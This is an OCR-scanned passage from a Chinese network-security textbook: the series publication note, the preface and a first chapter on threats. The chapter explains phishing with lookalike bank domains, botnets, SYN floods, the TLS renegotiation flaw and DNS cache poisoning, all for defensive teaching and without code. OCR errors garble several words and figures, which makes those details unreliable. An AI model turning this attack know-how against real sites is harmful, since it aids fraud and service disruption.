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内 容 简 介 
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出 版 说 明 


我 国 高 职高 专 教育 经 过 近 十 年 的 发 展 ,已 经 转向 深度 教学 改革 阶段 。 
教育 部 2006 年 12 月 发 布 了 教 高 [2006]16 号 文件 “关于 全 面 提 高 高 等 职业 
教育 教学 质量 的 若干 意见 ”, 大 力 推行 工学 结合 ,突出 实践 能 力 培养 ,全 面 提 
高 高 职高 专 教学 质量 。 

清华 大 学 出 版 社 为 了 进一步 推动 高 职高 专 计算 机 专业 教材 的 建设 工 
作 , 适 应 高 职高 专 院 校 计算 机 类 人 才 培 养 的 发 展 趋势 ,根据 教 高 [2006]16 
号 文件 的 精神 ,2007 年 秋季 开始 了 切合 新 一 轮 教学 改革 的 教材 建设 工作 。 

目前 国内 高 职高 专 院 校 计算 机 网 络 与 软件 专业 的 教材 品种 繁多 ,但 切 
合 国家 计算 机 网 络 与 软件 技术 专业 领域 技能 型 紧缺 人 才 培 养 培训 方案 并 符 
合 企业 的 实际 需要 、 能 够 成 体系 的 教材 还 不 成 熟 。 

我 们 组 织 国内 对 计算 机 网 络 和 软件 人 才 培 养 模式 有 研究 并 且 有 实践 经 
验 的 高 职高 专 院 校 ,进行 了 较 长 时 间 的 研讨 和 调研 ,六 选 出 一 批 富有 工程 实 
践 经 验 和 教学 经 验 的 双 师 型 教师 ,合力 编写 了 这 套 适用 于 高 职高 专 计算 机 
网 络 、 软 件 专业 的 教材 。 

本 大 ,教材 的 编写 方法 是 以 任务 驱动 案例 教学 为 核心 ,以 项 目 开发 为 主 
线 。 我 们 研究 分 析 了 国内 外 先进 职业 教育 的 培训 模式 、 教 学 方法 和 教材 特 
色 , 消 化 吸收 优秀 的 经 验 和 成 果 。 以 培养 技术 应 用 型 人 才 为 目标 ,以 企业 对 
人 才 的 需要 为 依据 ,把 软件 工程 和 项 目 管理 的 思想 完全 融入 教材 体系 ,将 基 
本 技能 培养 和 主流 技术 相 结 合 ,课程 设置 中 重点 突出 , 主 辅 分明 ,结构 合理 、 
衔接 紧凑 。 教 材 侧重 培养 学 生 的 实战 操作 能 力 . 学 、 思 、 练 相 结合 , 旨 在 通过 
项 目 实践 ,增强 学 生 的 职业 能 力 , 使 知识 从 书本 中 释放 并 转化 为 专业 技能 。 

一 、 教 材 编写 思想 

本 套 教材 以 案例 为 中 心 , 以 技能 培养 为 目标 ,围绕 开发 项 目 所 用 到 的 知 
识 点 进行 讲解 ,对 某 些 知 识 点 附 上 相关 的 例题 ,以 帮助 读者 理解 ,进而 将 知 
识 转 变 为 技能 。 

考虑 到 是 以 “项 目 设计 ”为 核心 组 织 教学 ,所 以 在 每 一 学 期 配 有 相应 的 
实 训 课程 及 项 目 开 发 手册 ,要 求学 生 在 教师 的 指导 下 .能 整合 本 学 期 所 学 的 
知识 内 容 ,相互 协作 ,综合 应 用 该 学 期 的 知识 进行 项 目 开 发 。 同 时 在 教材 中 
采用 了 大 量 的 案例 ,这 些 案 例 紧 密 地 结合 教材 中 的 各 个 知识 点 ,循序 渐进 ， 
由 浅 入 深 , 在 整体 上 体现 了 内 容 主导 、 实 例 解 析 , 以 点 带 面 的 模式 ,配合 课程 


后 期 以 项 目 设计 贯穿 教学 内 容 的 教学 模式 。 

软件 开发 技术 具有 种 类 繁多 、 更 新 速度 快 的 特点 。 本 套 教材 在 介绍 软件 开发 主流 技术 
的 同时 ,帮助 学 生 建立 软件 相关 技术 的 横向 及 纵向 的 关系 ,培养 学 生 综合 应 用 所 学 知识 的 
能 力 。 

二 、 从 书 特色 

本 系列 教材 体现 目前 的 工学 结合 教改 思想 ,充分 结合 教改 现状 ,突出 项 目 面向 教学 和 任 
务 驱 动 模式 教学 改革 成 果 , 打 造 立体 化 精品 教材 。 

(1) 参照 或 吸纳 国内 外 优秀 计算 机 网 络 、 软 件 专 业 教材 的 编写 思想 ,采用 本 土 化 的 实际 
项 目 或 者 任务 ,以 保证 其 有 更 强 的 实用 性 ,并 与 理论 内 容 有 很 强 的 关联 性 。 

(2) 准确 把 握 高 职高 专 软件 专业 人 才 的 培养 目标 和 特点 。 

(3) 充分 调查 研究 国内 软件 企业 ,确定 了 基于 Java 和 . net 的 两 个 主流 技术 路 线 ,再 将 
其 组 合成 相应 的 课程 链 。 

(4) 教材 通过 一 个 个 的 教学 任务 或 者 教学 项 目 , 在 做 中 学 ,在 学 中 做 ,以 及 边 学 边 做 , 重 
点 突出 技能 培养 。 在 突出 技能 培养 的 同时 ,还 介绍 解决 思路 和 方法 ,培养 学 生 未 来 在 就 业 岗 
位 上 的 终身 学 习 能 力 。 

(5) 借鉴 或 采用 项 目 驱 动 的 教学 方法 和 考核 制度 ,突出 计算 机 网 络 、 软 件 人 才 培 训 的 先 
进 性 .工具 性 、 实 践 性 和 应 用 人 性。 

(6) 以 案例 为 中 心 ,以 能 力 培养 为 目标 ,并 以 实际 工作 的 例子 引入 概念 ,符合 学 生 的 认 
知 规律 。 语 言 简洁 明了 清晰 易 懂 更 具 人 性 化 

(7) 符合 国家 计算 机 网 络 、 软 件 人 才 的 培养 目标 ; 采用 引入 知识 点 、 讲 述 知识 点 、 强 化 
知识 点 、 应 用 知识 点 ,综合 知识 点 的 模式 ,由 浅 入 深 地 展开 对 技术 内 容 的 讲述 。 

(8) 为 了 便于 教师 授课 和 学 生 学 习 , 清 华 大 学 出 版 社 正在 建设 本 套 教材 的 教学 服务 资 
源 。 在 清华 大 学 出 版 社 网 站 (www. tup. com. cn) 免 费 提供 教材 的 电子 课件 .案例 库 等 资源 。 

高 职高 专 教育 正 处 于 新 一 轮 教 学 深度 改革 时 期 ,从 专业 设置 .课程 体系 建设 到 教材 建 
设 ,依然 是 新 课题 。 希 望 各 高 职高 专 院 校 在 教学 实践 中 积极 提出 意见 和 建议 ,并 及 时 反馈 给 
我 们 。 清 华 大 学 出 版 社 将 对 已 出 版 的 教材 不 断 地 修订 、 完 善 .提高 教材 质量 ,完善 教材 服务 
体系 ,为 我 国 的 高 职高 专 教育 继续 出 版 优秀 的 高 质量 的 教材 。 


清华 大 学 出 版 社 
高 职高 专 计算 机 任务 驱动 模式 教材 编审 委员 会 


rawstone@ 126. com 
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随 着 计算 机 网 络 的 日 益 普及 和 广泛 应 用 ,网 络 和 信息 的 安全 问题 日 益 
突出 ,构建 安全 可 靠 、 健 康 的 网 络 应 用 环境 ,维护 国家 信息 网 络 的 安全 和 保 
障 敏 感 信息 资料 的 安全 ,已 成 为 社会 信息 化 进程 中 或 待 解决 的 问题 ,为 此 ， 
完善 信息 安全 立法 ,学习 掌握 网 络 安全 防范 技能 ,着 力 加 强 网 络 安全 队伍 建 
设 和 安全 技术 研究 ,培养 网 络 安全 专业 人 员 , 对 保障 网 络 和 信息 的 安全 , 提 
高 国家 网 络 安全 水 平 ,就 显得 至 关 重 要 和 紧迫 。 

计算 机 网 络 安全 是 一 门 比较 传统 和 经 典 的 课程 ,目前 国内 与 计算 机 网 
络 安全 相关 的 教材 ,在 数量 和 种 类 上 都 较 多 ,但 真正 编写 得 比较 实用 的 教材 
却 不 多 。 计算机 网 络 安全 涉及 的 专业 知识 面 较 广 较 深 ,需要 具备 较 丰 富 的 
网 络 安全 管理 和 攻防 实战 经 验 ,要 真正 写 好 确实 不 容易 。 

本 书 以 网 络 安全 理论 知识 够 用 、 实 用 ,突出 网 络 安 全 实用 技能 培养 ,以 
能 力 为 本 位 作为 编写 指导 思想 。 采 取 先 了 解 黑 客 的 攻击 技术 ,再 做 网 管 的 
编写 思路 来 组 织 全 书 的 内 容 和 章节 顺序 。 

本 书 的 编写 目标 是 通过 对 该 教材 内 容 的 学 习 和 实践 操作 ,培养 具有 独 
立 承 担 大 ,中 型 网 络 的 安全 设置 与 防范 和 安全 管理 的 能 力 , 成 为 一 名 合格 的 
计算 机 网 络 安全 专业 人 员 。 

本 书 的 特色 主要 体现 在 以 下 三 个 方面 。 

(1) 内 容 新 颖 ,实用 性 和 可 操作 性 强 , 攻 防 案例 真实 有 效 。 在 内 容 上 做 
到 与 时 俱 进 , 紧 扣 时 代 特 色 , 针 对 目前 主流 的 网 络 服务 器 操作 系统 ,详细 介 
绍 网 络 攻击 与 人 侵 、 网 络 和 服务 器 的 安全 防范 技术 和 电子 商务 安全 的 整体 
解决 方案 。 

(2) 突出 网 络 安全 实用 技能 培养 .以 能 力 为 本 位 作为 编写 的 指导 思想 。 

(3) 在 内 容 的 组 织 和 讲解 上 ,充分 体现 * 易 学 易 教 "的 原则 。 

本 书 还 详细 全 面 地 介绍 了 电子 商务 的 安全 知识 和 电子 商务 安全 的 整体 
解决 方案 ,同时 还 详细 介绍 了 利用 PGP 加 解密 软件 .实现 对 邮件 通信 ,数据 
存储 和 传输 的 高 强度 加 密 保护 。 最 后 ,针对 电子 商务 应 用 常用 的 安全 Web 
服务 器 ,详细 介绍 了 安全 Web 服务 器 的 安装 、 配 置 与 使 用 方法 ,因此 ,本 书 
也 可 作为 电子 商务 专业 的 电子 商务 安全 教材 。 


oi} 


本 书 配 有 习题 和 实 训 操作 ,相关 资源 可 访问 作者 网 站 来 获得 ,网 址 是 http://www. 
pcnetedu. com/getbkres. asp。 全 书 共 7 章 , 建 议 学 时 数 不 低 于 64 学 时 。 
限于 笔者 学 识 , 玻 漏 之 处 , 敬 请 批评 指正 。 
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本 章 主要 介绍 计算 机 网 络 安全 的 概念 .计算 机 网 络 的 安全 现状 和 面临 的 安全 威胁 ,计算 
机 网 络 安全 的 要 素 与 解决 途径 ,以 及 我 国 的 信息 安全 法 律 法规。 


1.1 计算 机 网 络 安全 的 概念 


计算 机 网 络 由 网 络 硬 件 设备 、 网 络 控制 管理 协议 与 软件 ,以 及 网 络 存储 和 传输 交换 的 网 
络 数据 三 部 分 构成 ,因此 计算 机 网 络 安全 包括 物理 安全 和 信息 安全 两 个 方面 。 

物理 安全 主要 指 网 络 系统 的 设备 及 相关 设施 受到 物理 保护 (防火 .防盗 、 防 雷 、 防 静电 、 
机 房 温度 湿度 控制 保护 ,电压 控制 保护 和 通信 线路 安全 等 ), 免 于 破坏 和 丢失 ,并 提供 设备 正 
常 运行 所 需 的 工作 环境 。 

通常 情况 下 ,计算 机 网 络 安全 主要 指 计算 机 网 络 的 信息 安全 。 计 算 机 网 络 的 信息 安全 
包括 网 络 通信 协议 各 种 网 络 服务 和 操作 系统 软件 .网 络 存储 处 理 和 传输 交换 的 网 络 数据 的 
安全 等 方面 。 网 络 存储 的 数据 包括 服务 器 、 终 端 用 户主 机 以 及 网 络 存储 设备 中 存储 的 数据 。 
网 络 存储 设备 主要 有 磁盘 阵列 柜 .IP SAN 和 FC SAN 等 。 

国际 标准 化 组 织 (ISO) 将 “计算 机 安全 "定义 为 : 为 数据 处 理 系统 建立 和 采取 的 技术 和 
管理 的 安全 保护 ,保护 计算 机 硬件 .软件 数据 不 因 偶 然 的 原因 和 恶意 而 遭 到 破坏 、 更 改 和 污 
露 。 计 算 机 网 络 安全 包含 计算 机 安全 ,二 者 有 着 密切 的 关系 ,因此 ,计算 机 网 络 安全 可 定义 
为 : 计算 机 网 络 系统 中 的 硬件 .软件 及 其 数据 受到 保护 ,不 因 偶然 的 或 者 恶意 的 原因 而 遭 到 
破坏 ,更改 和 泄露 ,保障 网 络 系统 连续 可 靠 地 正常 运行 ,网 络 服务 不 被 中 断 。 

计算 机 网 络 安全 的 目标 是 通过 采用 各 种 技术 和 管理 措施 ,使 网 络 系统 和 各 项 网 络 服务 
正常 运行 ,经 过 网 络 传输 和 交换 的 数据 不 会 发 生 丢失 、, 自 改 或 泄密 ,从 而 确保 网 络 的 可 靠 性 ， 
网 络 数据 的 机 密 性 、 完 整 性 和 可 用 性 。 


1.2 计算 机 网 络 安全 现状 与 安全 威胁 
1.2.1 计算 机 网 络 安全 现状 


计算 机 网 络 是 计算 机 技术 和 通信 技术 发 展 的 必然 产物 ,进入 20 世纪 90 年 代 以 后 ,以 因 
特 网 为 代表 的 计算 机 网 络 得 到 了 飞速 发 展 ,加 速 了 全 球 数字 化 、 网 络 化 和 信息 化 革命 的 


进程 。 

近年 来 ,互联 网 在 我 国 得 到 了 持续 的 快速 发 展 , 已 成 为 重要 的 国家 基础 设施 ,在 国民 经 
济 建设 中 发 挥 着 日 益 重 要 的 作用 。 据 中 国 互 联网 络 信息 中 心 CCNNIC) 在 2010 年 7 月 
15 日 发 布 的 《第 26 次 中 国 互联 网 络 发 展 状况 统计 报告 ,截至 2010 年 6 月 底 ,我 国 网 民 规 
模 已 达 4. 2 亿 , 互 联网 普及 率 进 一 步 提升 ,达到 31.87. 

随 着 我 国 互联 网 普及 率 的 逐年 提高 ,互联 网 已 走 进 人 们 的 工作 与 生活 ,影响 和 改变 着 人 
们 的 生活 、 工 作 和 学 习 方 式 。 互 联网 丰富 的 信息 资源 给 用 户 带 来 了 极 大 的 方便 ,由 于 因特网 
是 一 个 开放 的 ,超越 组 织 与 国界 的 ,不 安全 的 互联 网 络 ,这 就 给 上 网 用 户 和 数据 信息 带 来 了 极 
大 的 安全 隐患 。 计 算 机 信息 的 安全 问题 ,尤其 是 计算 机 网 络 的 信息 安全 问题 正 变 得 日 益 突 出 。 

随 着 海关 、 税 务 .电力 、 金 融 等 基础 性 行业 信息 化 的 深入 ,网 络 安全 已 成 为 关系 到 国家 安 
全 和 社会 稳定 的 重要 因素 。 目 前 ,网 络 安全 形势 不 容 乐 观 。 木 马 与 病毒 传播 相当 泛滥 ,网 络 
攻击 事件 时 有 发 生 , 网 络 钓 鱼 (Phishing) 欺 诈 在 全 世界 范围 内 变 得 非常 独 锋 ,数量 急剧 梦 
升 。 利 用 伪装 成 中 国 银行 或 中 国 工商 银行 网 站 的 恶意 网 站 进行 诈骗 钱财 的 事件 ,已 让 人 们 
感受 到 网 络 钓鱼 已 不 再 遥远 。 

钓鱼 网 站 由 于 投入 少 ` 回 报 大 ,伴随 网 购 热潮 已 经 悄然 兴起 。 据 国际 行业 组 织 反 钓鱼 工 
作 组 的 数据 ,2009 年 一 个 月 新 建 的 独立 钓鱼 网 站 就 高 达 5 万 个 。 截 至 2009 年 11 月 底 ,中 
国 反 钓鱼 网 站 联盟 累计 收 到 的 钓鱼 网 站 投诉 达 12000 例 ,钓鱼 网 站 投诉 前 三 位 的 分 别 是 淘 
宝 网 .CCTV 和 腾讯 网 , 占 投 诉 总 量 的 74% 以 上 。 

网 络 钓鱼 主要 利用 障 眼 法 和 贪图 便宜 的 心理 来 实施 诈骗 。 钓 鱼网 站 主要 集中 在 两 方 
Hü: 一 种 是 模仿 央视 或 其 他 抽奖 网 站 ,比如 ,仿冒 央视 的 “非常 6 十 1” 或 春晚 节目 的 中 奖 信息 
来 骗取 网 民 钱 财 ,其 主要 特征 是 以 中 奖 为 诱 乌 ,欺骗 网 民 填写 身份 信息 、 银 行 账户 等 信息 。 
另 一 种 是 仿冒 淘宝 网 店 、 工 商 银行 网 站 、 中 国 银行 网 站 等 在 线 支付 网 页 ,然后 诱骗 用 户 访 问 
这 些 钓鱼 网 站 ,从 而 骗取 支付 宝 账户 和 支付 密码 、 银 行 卡 账户 和 密码 ,达到 套 取 银 行 账户 资 
金 的 目的 。 

钓鱼 的 银行 网 站 除了 在 内 容 上 与 真实 的 银行 网 站 模仿 得 相似 之 外 ,在 网 站 的 域名 上 ， 
也 会 使 用 障 眼 法 做 得 非常 相似 。 比 如 ,真正 的 工商 银行 网 站 域名 为 www. icbc. com. cn, Iñ] 
钓鱼 网 站 的 域名 则 设计 为 www. lcbc. com. en, 二 者 的 区 别 仅 是 小 写字 母 i 和 数字 1 的 不 
同 。 又 比如 中 国 银行 网 站 的 域名 为 www. bank-of-china. com, 钩 鱼网 站 的 域名 则 设计 为 
www. bank-off-china. com, 

目前 ,黑客 通过 网 络 有 组 织 地 制作 ,传播 和 销售 木马 病毒 的 黑客 产业 链 正 在 形成 。 据 
360 安全 卫士 总 裁 齐 向 东 称 ,2009 年 中 国 黑客 通过 制作 ,传播 和 销售 木马 病毒 的 非法 收入 估 
HA 100 亿 元 以 上 ,按照 这 个 销售 额 来 估计 ,从 业 人 员 可 达 10 万 人 。 这些 木 马 病毒 的 大 量 
制作 和 传播 ,给 网 络 和 信息 安全 带 来 了 极 大 的 安全 威胁 ,严重 妨碍 了 信息 化 社会 的 健康 发 
展 。 同 时 ,木马 病毒 攻陷 入 侵 用 户主 机 后 ,除了 窃取 机 密 信息 外 ,该 主机 还 可 能 成 为 受 黑客 
控制 的 “僵尸 电脑 (俗称 肉鸡 )”, 众 多 的 "僵尸 电脑 在 网 络 中 形成 “僵尸 网 络 ”(BotNet) ,这 
些 受 黑客 控制 的 "僵尸 网 络 ” .在 利益 的 驱使 下 ,可 根据 需要 对 要 攻击 的 目标 网 站 或 目标 网 络 
发 起 大 规模 的 分 布 式 拒绝 服务 攻击 (Distributed Denial of Service. DDoS) ,使 被 攻击 的 目标 
网 站 或 目标 网 络 瘫痪 .。“ 僵 尸 网 络 ? 是 目前 进行 DDoS 攻击 的 理想 工具 ,这 种 攻击 方式 已 经 
沦 为 进行 不 公平 竞争 或 者 网 络 恐 怖 主义 示威 和 实施 的 工具 ,成 为 黑客 最 青睐 的 作案 工具 。 
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“僵尸 网 络 ” 制 造 者 的 收入 来 源 包括 DDoS 攻击 、 窃 取 机 密 信息 (信用 卡 或 银行 卡 账号 、 
游戏 账号 和 游戏 装备 .财务 信息 以 及 各 种 服务 的 密码 等 ) ,发送 垃圾 邮件 、 网 络 钓鱼 .搜索 引 
人 擎 作 静 .广告 点 击 欺诈 以 及 传播 恶意 软件 和 广告 软件 等 ,这 些 行为 都 是 可 盘 利 的 ,而 且 * 僵 己 
网 络 ? 可 以 同时 实施 这 些 行为 。 据 赛 门 铁 克 公司 (Symantec) 的 统计 ,目前 互联 网 中 的 垃圾 
邮件 有 80% 来 自 于 僵尸 网 络 。2010 年 2 月 ,微软 公司 成 功 游说 美国 司法 部 签发 法 院 令 , 让 
277 个 与 Waledac 僵尸 网 络 (每 天 可 发 送 15 亿 条 垃圾 信息 ) 相 关 的 域名 停止 解析 ,从 而 迅速 
有 效 地 切断 了 Waledac 僵尸 网 络 数 以 千 计 的 链接 。 但 微软 公司 的 做 法 并 不 能 完全 解决 僵尸 
网 络 的 问题 ,仅仅 是 使 Waledac 僵尸 网 络 的 问题 得 到 暂时 的 缓解 。 

因此 ,采取 有 效 措施 ,构建 安全 ,可 靠 、 健 康 的 网 络 应 用 环境 ,维护 国家 信息 网 络 的 安全 ， 
已 成 为 社会 信息 化 进程 中 或 待 解决 的 问题 ,为 此 ,完善 信息 安全 立法 ,着力 加 强 网 络 安全 队 
伍 建设 和 技术 研究 ,培养 网 络 安全 专业 人 员 ,就 显得 至 关 重 要 和 紧迫 。 


1.2.2 计算 机 网 络 面 临 的 安全 威胁 


计算 机 网 络 面临 的 安全 威胁 是 多 方面 的 ,有 人 为 原因 ,也 有 非 人 为 原因 ,其 安全 威胁 主 
要 表现 在 以 下 方面 。 

1. 计算 机 网 络 自身 特性 所 带 来 的 安全 威胁 

计算 机 网 络 的 开放 性 、 自 由 性 和 国际 互联 特性 ,使 计算 机 网 络 面临 的 攻击 是 多 方面 的 ， 
网 络 安全 威胁 面临 国际 化 挑战 。 

对 计算 机 网 络 的 攻击 可 来 自 物理 传输 线路 ,也 可 来 自 对 网 络 通 信 协 议 的 攻击 ,或 通过 计 
算 机 软件 或 硬件 的 漏洞 来 实施 攻击 。 计 算 机 网 络 的 国际 互联 特性 ,使 攻击 者 可 以 是 本 国 或 
本 地 用 户 ,也 可 以 来 自 全 球 任何 国家 。 

2. 计算 机 网 络 自 身 的 缺陷 所 带 来 的 安全 威胁 

(1) 计算 机 网 络 通信 协议 缺陷 所 带 来 的 安全 威胁 

目前 互联 网 广泛 使 用 的 是 TCP/IP 协议 徐 。 这 些 协议 在 设计 时 由 于 考虑 不 周 ( 在 设计 
的 当时 ,也 可 能 不 存在 这 方面 的 安全 威胁 ) 或 受 当 时 的 环境 所 限 ,或 多 或 少 存在 着 一 些 设计 
缺陷 。 网 络 协 议 的 缺陷 是 导致 网 络 不 安全 的 主要 原因 之 一 。 

互联 网 协议 在 设计 时 不 存在 太 多 的 安全 问题 ,因此 协议 对 安全 问题 考虑 得 较 少 。 比 如 
在 1983 年 设计 DNS 的 时 候 , 不 需要 考虑 安全 问题 ,甚至 到 1993 年 ( 首 款 真正 的 浏览 器 
Netscape Navigator 诞生 ) 都 不 存在 这 个 问题 。 直 到 20 世纪 90 年 代 末 ,人 们 才 在 安全 上 大 
量 投入 ,也 就 是 从 那 时 起 ,开始 有 人 盯 上 了 网 络 中 的 资产 并 实施 破坏 。 

由 于 安全 是 相对 的 ,没有 绝对 的 安全 .因此 .没有 绝对 安全 可 靠 的 网 络 通信 协议 。 下 面 
简要 介绍 几 个 网 络 通信 协议 缺陷 所 带 来 的 安全 威胁 。 

O TCP 协议 缺陷 易 导 致 SYN 泛 洪 攻击 ,服务 器 容易 遭受 拒绝 服务 或 分 布 式 拒 绝 服务 
攻击 。 

传输 控制 协议 TCP 提供 了 面向 连接 的 、 高 可 靠 性 的 端 到 端的 连接 服务 。TCP 协议 在 
建立 TCP 连接 之 前 的 三 次 握手 过 程 中 存在 缺陷 ,这 种 协议 缺陷 可 导致 SYN 泛 洪 攻击 
(SYN Flood) ,使 网 络 应 用 服务 器 易 遭 受到 拒绝 服务 (Denial of Service, DoS) 或 分 布 式 拒绝 
服务 攻击 (DDoS) 。 

下 面 对 TCP 协议 在 三 次 握手 过 程 中 存在 的 缺陷 做 简要 分 析 。 


在 建立 TCP 连接 时 ,服务 请 求 方 (客户 端 ) 向 服务 器 (服务 端 ) 发 起 建立 连接 的 请 求 报 文 
(SYN 标志 位 置 为 1) ; 服务 器 给 客户 端 回应 响应 报 文 (ACK 和 SYN 标志 位 均 置 为 1); 客 
户 端 在 收 到 服务 方 的 响应 报 文 后 .正常 情况 下 ,客户 端 应 给 服务 器 回应 一 个 响应 报 文 (ACK 
标志 位 置 为 1) ,从 而 完成 三 次 握手 过 程 ,建立 起 TCP 连接 。 但 此 时 ,车 客户 端 故意 不 回复 
第 三 次 握手 的 ACK 回应 报 文 , 这 将 使 服务 器 为 接收 到 该 回应 报 文 而 等 待 一 段 时 间 ,该 等 待 
时 间 为 SYN 超时 时 间 (30s 一 2min) 。 

由 于 TCP 连接 已 建立 到 中 途 , 服 务 器 端 会 为 这 个 即将 完成 的 TCP 连接 分 配 一 定 的 系 
统 资 源 , 因 此 ,这 种 处 于 半 连 接 状态 的 TCP 连接 ,会 消耗 一 定 的 服务 器 资源 。 

如 果 一 个 客户 端 或 大 量 的 客户 端 ( 比 如 僵尸 网 络 ) 同 时 向 服务 器 发 起 建立 大 量 的 半 连 
接 , 则 会 很 快 消耗 尽 服 务 器 的 系统 资源 ,正常 的 应 用 服务 进程 (比如 Web 服务 .FTP 服务 或 
邮件 服务 等 ) 因 无 法 获得 可 用 的 系统 资源 而 被 中 止 , 导 致 服务 器 无 法 为 正常 的 客户 提供 服 
务 ,最终 导 致 服务 器 出 现 拒绝 服务 的 现象 。 

© TLS 和 SSL 协议 的 漏洞 易 导致 用 户 浏览 器 被 劫持 ,遭受 到 中 间 人 攻击 。 

PhoneFactor 公司 的 Marsh Ray 和 Steve Dispensa 安全 专家 于 2009 年 11 月 4 日 正式 
公开 了 Marsh Ray 于 2009 年 8 月 份 发 现 的 TLS 和 SSL 协议 中 的 一 个 致命 安全 漏洞 。 攻 
击 者 可 以 利用 这 种 漏洞 劫持 用 户 的 浏览 器 ,并 伪装 成 合法 用 户 ,进行 中 间 人 攻击 (Man in 
The Middle) 。 

这 两 位 安全 专家 指出 ,由 于 TLS 协议 中 验证 服务 器 及 客户 机 身份 的 一 连 串 动作 中 存在 
前 后 不 连贯 的 问题 ,这 就 给 攻击 者 可 乘 之 机 。TLS 协议 中 存在 的 这 种 漏洞 在 SSL 协议 上 同 
样 存在 。TLS 和 SSL 协议 中 的 该 漏洞 ,给 攻击 者 发 起 HTTPS 攻击 也 提供 了 便利 。 

传输 层 保密 协议 TLS(Transport Layer Security) 和 Socket 层 保密 协议 SSL (Secure 
Sockets Layer) 是 目前 广泛 使 用 的 安全 保密 协议 ,也 是 互联 网 的 标准 通信 协议 。 互 联网 中 的 
加 密 通信 广泛 采用 了 TLS SSL 协议 来 进行 。 目 前 网 络 银行 ,网 上 在 线 交 易 和 数字 证 书 
的 加 密 传输 均 采 用 HTTPS 协议 ,而 HTTPS 协议 是 HTTP 协议 和 TLS/SSL 协议 的 集合 
体 ,HTTPS 协议 中 的 加 密 部 分 采用 的 是 TLS 或 SSL 协议 。 因 此 ,TLS 和 SSL 协议 的 该 漏 
洞 对 互联 网 业 的 安全 影响 是 全 面 的 和 致命 的 。 

发 现 这 一 漏洞 之 后 ,Marsh Ray 和 Steve Dispensa 很 快 将 其 报告 给 了 互联 网 安全 促进 
行业 联盟 (ICASI) ,该 联盟 由 思科 、IBM、Intel、Juniper、 微 软 和 诺基亚 共同 创立 。 同 时 还 报 
告 给 了 Internet 工程 任务 组 (IETF) 以 及 几 家 开源 的 SSL 项 目 组 织 。2009 年 9 月 29 日 ,这 
些 团体 经 过 讨论 后 决定 推出 一 项 名 为 Mogul 的 计划 ,该 计划 将 负责 修补 这 个 漏洞 ,计划 的 
首要 任务 是 尽快 推出 新 的 协议 扩展 版 .以 修复 该 漏洞 。 

目前 微软 的 所 有 Windows 版 本 (包括 服务 器 和 客户 端 产 品 ) 均 受 此 安全 漏洞 影响 ,微软 
表示 ,当前 还 没有 发 现 有 利用 此 漏洞 进行 的 攻击 行为 ,由 于 该 漏洞 影响 的 是 互联 网 标准 , 因 
此 微软 不 是 单一 受害 者 。 

© DNS 漏洞 导致 域名 解析 被 劫持 , 带 来 严重 的 安全 威胁 。 

在 1983 年 设计 DNS 时 ,未 考虑 安全 问题 .导致 DNS 系统 的 安全 漏洞 一 直 较 多 。2008 年 
初 ,IOActive 公司 的 安全 研究 人 员 Dan Kaminsky 在 同 多 个 DNS 系统 商 共 同 开发 安全 补丁 
的 时 候 ,发 现 了 DNS 系统 的 一 个 结构 性 的 ,非常 严重 的 安全 漏洞 。 利 用 该 漏洞 ,攻击 者 只 需 
利用 一 个 有 效 的 漏洞 脚本 ,就 能 在 10 秒 之 内 发 起 一 个 “DNS cache poisoning” (ONS 缓存 投 
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毒 ) 攻 击 ,该 攻击 成 功 后 可 向 DNS 服务 器 的 缓存 插入 任何 数据 ,比如 将 错误 的 域名 解析 指向 
信息 注入 到 DNS 服务 器 缓存 ,从 而 改变 域名 的 解析 结果 ,导致 受到 污染 ( 投 毒 ) 的 DNS 服务 
器 对 外 提供 错误 的 域名 解析 ,达到 支持 DNS 域名 解析 ,将 访问 者 在 不 知情 的 情况 下 引导 到 
黑客 指定 的 恶意 网 站 (比如 钓鱼 网 站 木马 自动 下 载 网 站 或 者 黑客 事先 设计 好 的 其 他 网 站 ) 
的 目的 ,因此 ,该 漏洞 的 危险 性 极 高 ,利用 该 漏洞 可 造成 域名 劫持 攻击 ,使 攻击 者 能 轻松 地 伪 
造 任何 网 站 ,使 用 户 浏览 到 伪造 的 网 站 ,邮件 也 可 能 被 发 送 到 错误 的 地 方 ,给 全 球 用 户 带 来 
一 系列 严重 的 安全 威胁 。 

DNS 是 互联 网 的 一 项 核心 服务 ,相当 于 整个 互联 网 的 心脏 ,DNS 解析 的 准确 性 非常 重 
要 ,一旦 遭 到 破坏 ,互联 网 的 正常 运转 将 被 打 乱 。 为 了 不 让 互联 网 遭受 重创 ,Dan Kaminsky 
坚持 在 该 漏洞 得 到 解决 之 前 不 透露 漏洞 的 细节 。 

发 现 该 安全 漏洞 后 ,Dan Kaminsky 立即 联系 了 ISC 公司 的 总 裁 Paul Vixie(BIND 的 设 
计 者 ,BIND 是 Linux/UNIX 平台 的 DNS 服务 软件 ) , 告 之 了 漏洞 细节 。 之 后 ,DNS 业界 的 
思科 、 微 软 \ISC 等 互联 网 域名 解析 服务 软件 厂商 开始 共同 研究 和 商谈 漏洞 的 修复 问题 ,并 
最 终 推 出 了 由 多 家 厂商 共同 开发 的 DNS 漏洞 修复 补丁 。 

为 了 让 网 络 运营 商 知 道 这 个 漏洞 和 漏洞 的 严重 性 ,说服 网 络 运营 商 和 DNS 服务 器 拥有 
者 升级 DNS 系统 ,Dan Kaminsky 于 2008 年 7 月 8 日 公开 了 该 漏洞 及 其 危害 性 ,但 未 透露 
漏洞 的 细节 。2008 年 7 月 9 日 ,思科 、 微 软 、ISC 等 互联 网 域名 解析 服务 软件 厂商 纷纷 发 布 
了 关于 该 漏洞 的 安全 公告 ,要求 DNS 服务 商 升 级 DNS 系统 。 由 于 该 漏洞 影响 的 面 非常 广 , 非 
常 严重 ,该 漏洞 公布 后 , 秀 动 了 整个 IT 界 , 该 漏洞 被 称 为 Kaminsky 漏洞 。Dan Kaminsky 近 
照 如 图 1. 1 所 示 。 


图 1.1 DNS 严重 安全 漏洞 发 现 者 Dan Kaminsky 


之 后 不 久 , Matasano 安全 公司 的 一 个 员工 在 其 博客 中 泄露 了 该 漏洞 的 细节 。 为 此 ， 
Dan Kaminsky 在 其 博客 上 发 表 了 一 个 紧急 消息 ,提醒 DNS 漏洞 细节 被 泄露 ,攻击 即将 开 
kñ. 2008 年 7 月 22 日 ,针对 该 漏洞 的 探测 程序 被 发 布 ,7 月 23 日 ,针对 该 漏洞 的 完整 攻击 
程序 被 发 布 ,并 随后 广泛 流传 。 

目前 ,Kaminsky 漏洞 细节 在 黑客 界 已 众所周知 。 下 面 对 该 漏洞 的 细节 和 攻击 原理 作 
简要 分 析 ,以 帮助 读者 更 好 的 理解 漏洞 对 于 安全 威胁 的 严重 性 。 

